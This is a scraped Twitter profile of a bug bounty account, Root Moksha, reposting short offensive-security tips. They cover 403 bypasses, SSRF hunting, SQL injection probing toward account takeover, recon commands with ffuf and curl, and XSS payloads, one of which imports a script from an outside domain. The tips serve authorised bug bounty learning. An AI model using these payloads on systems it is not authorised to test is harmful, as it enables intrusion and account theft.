Root Moksha(@RootMoksha) 's Twitter Profileg
Root Moksha

@RootMoksha

Crowdsourcing web3 native cybersecurity - coming soon

ID:1721857998941761536

linkhttps://rootmoksha.com/ calendar_today07-11-2023 11:51:59

719 Tweets

4,5K Followers

1 Following

Root Moksha(@RootMoksha) 's Twitter Profile Photo

If you are trying to access an endpoint and get 403
try this
/api/docs/index.html ==> 403 Forbidden
/api/Docs/index.html ==> 200 Ok

By:Zayed 🇵🇸

If you are trying to access an endpoint and get 403 try this /api/docs/index.html ==> 403 Forbidden /api/Docs/index.html ==> 200 Ok By:@D0L0RESH4Z3 #BugBounty #bugbountytips
account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo

Top 5 places to look for SSRF vulnerabilities: 😎

• Profile image loaders
• External file or data processors (like webhooks)
• PDF Generators (through HTML Injection)
• Host header injections
• File uploads (via XML for example)

By:Intigriti

tips

account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo

XSS in an email address is underrated. (email is rarely sanitized by companies).Use catch-all and then you can also verify your account (if required).

'><img/src/onerror=import('//domain/')>'@yourdomain
.com

cc Brute Logic

brutelogic.com.br/blog/xss-limit…

tips

account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo

Shortscan is designed to quickly determine which files with short filenames exist on an IIS webserver.
github.com/bitquark/short…

account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo

SQL Injection to Account Takeover Manually :)
1. Enter mobile number to login intercept
{'mobile_number':'8888888888'} >> 200
{'mobile_number':'8888888888''} >> 500
{'mobile_number':'8888888888'''} >> 200

credit: BBR - Bug Bounty Resources 🧵

tips

SQL Injection to Account Takeover Manually :) 1. Enter mobile number to login intercept {'mobile_number':'8888888888'} >> 200 {'mobile_number':'8888888888''} >> 500 {'mobile_number':'8888888888'''} >> 200 credit: @bbr_bug #bugbountytips #bugbounty
account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo

Ffuf for parameter guessing by Otterly

ffuf -u 'https://target\.com/payment.php?FUZZ=regular' -w ~/wordlists/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt

account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo

Dump URLs from sitemap.xml:

curl -s http://HOST/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'

Credit:Plxx

account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo

If you see android:exported='true' in AndroidManifest.xml in Android pentests, you should definitely try the intent injection method, this may give you ssrf, exfiltration sensitive data, rce.

Credit:𐰚𐰼𐰇𐱅

If you see android:exported='true' in AndroidManifest.xml in Android pentests, you should definitely try the intent injection method, this may give you ssrf, exfiltration sensitive data, rce. Credit:@ynsmroztas #BugBounty #bugbountytips
account_circle
Root Moksha(@RootMoksha) 's Twitter Profile Photo

Basic XSS Encoding Tips

1) alert = window['al'+'ert']
2) bypass () with ``
3) replace space with /
4) encode symbols:

< = %3c
> = %3e
' = %22
[ = %5b
] = %5d
` = %60

Example Payload:
%3csvg/onload=window%5b'al'+'ert'%5d`1337`%3e
By:Sergio Medeiros

account_circle